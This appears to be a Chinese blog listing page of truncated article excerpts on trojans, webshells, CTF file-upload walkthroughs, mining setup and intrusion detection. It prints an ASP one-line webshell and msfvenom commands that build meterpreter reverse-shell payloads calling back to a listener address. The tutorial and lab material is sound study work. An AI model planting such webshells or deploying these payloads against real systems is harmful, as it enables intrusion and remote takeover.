一句话木啊基础 短,小,强,隐蔽好,powerful,2333333,基于B/S <%execute request("value")%> execute是参数 eval是来执行参数的 对于网站来说,要对用上马即支持的运行环境,(iis支持asp、aspx、php),asp无权调用cmd,aspx有 ...
分类:
其他好文 时间:
2021-07-21 17:35:19
阅读次数:
0
在一些应急场景中,我们经常会遇到有些木马会替换常用的系统命令进行伪装,即使我们清理了木马,执行ps、netstat等系统命令时又启动了木马进程。 这种手法相对比较隐蔽,排查起来也比较困难,本文分享两种比较简单的排查技巧。 1、AIDE 入侵检测 AIDE 是一款入侵检测工具,主要用途是检查文档的完整 ...
分类:
系统相关 时间:
2021-07-19 16:55:05
阅读次数:
0
ipconfig 计算机基本信息命令 ping 命令 netstat -n命令 netstat /?命令 ping +网址命令 netstat -n查会话查木马 ...
分类:
其他好文 时间:
2021-06-18 19:09:06
阅读次数:
0
挖矿是使用电子设备挖取虚拟货币的一个过程 挖矿需要准备几个步骤 1.挖矿时的虚拟货币钱包 2.矿池,这里使用的是星火矿池作为演示(https://www.sparkpool.com/) 3.挖矿工具(互联网上有很多,这里使用NBMiner作为演示) 以上三个步骤不多赘述 具体讲下我们的程序需要做的事 ...
分类:
其他好文 时间:
2021-06-13 10:33:08
阅读次数:
0
看起来和3很相似,但是测试未成功发现错误,要用别的方法 查看默认目录得到日志路径,抓包将一句话木马插入于用于代理中 放包后蚁剑进行连接 找到flag ...
分类:
Web程序 时间:
2021-06-02 19:56:24
阅读次数:
0
这种上传类的一般都是利用一句话木马: 1.在记事本里写一句话木马,然后修改后缀。 2.上传之前用burp拦截一下,改一下参数: 3.可以看到显示上传成功,路径也出来了: 4.用蚁剑连一下: 5.一般这种的都在根目录,直接去根目录里找,找到了flag: flag ...
分类:
Web程序 时间:
2021-04-21 12:59:26
阅读次数:
0
一、背景分析 新基建加速推动5G与AI人工智能等技术迅猛发展,这为全国高速公路云联网提供了技术支撑。然而,由于高速公路视频监控网络涵盖的设施种类繁多,物联网终端个体抵挡黑客非法攻击的能力较弱,无法安装准入软件,因此极易存在伪造终端接入、木马注入、病毒注入等风险。另一方面,大部分高速公路都缺少视频终端 ...
分类:
其他好文 时间:
2021-04-13 12:14:45
阅读次数:
0
环境: win7 64位,word2013 生成木马 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.64.135 LPORT=1122 -f psh-reflection >x.ps1 ? 放到VPS上,这里我们放到本机搭 ...
分类:
系统相关 时间:
2021-03-18 14:14:35
阅读次数:
0
msf自带的有对应各个平台生成木马的工具msfvenom,而且不需要进入msf,直接在命令行输入命令即可 木马生成命令 msfvenom -p payload LHOST=本地地址 LPORT=本地端口 -f 文件类型 -o 木马文件 如: msfvenom -p windows/meterpret ...
分类:
移动开发 时间:
2021-03-02 12:09:24
阅读次数:
0
什么是文件上传漏洞 文件上传漏洞是指由于程序员在对用户上传部分控制不足或者处理缺陷,导致用户可以越权向服务器上传可执行的动态脚本文件。这里的上传可以是木马,病毒恶意脚本,或者webshell等。文件上传本 身并无问题,问题是服务器怎么处理解析文件。 什么是webshell webshell就是以as ...
分类:
Web程序 时间:
2021-01-19 11:39:11
阅读次数:
0
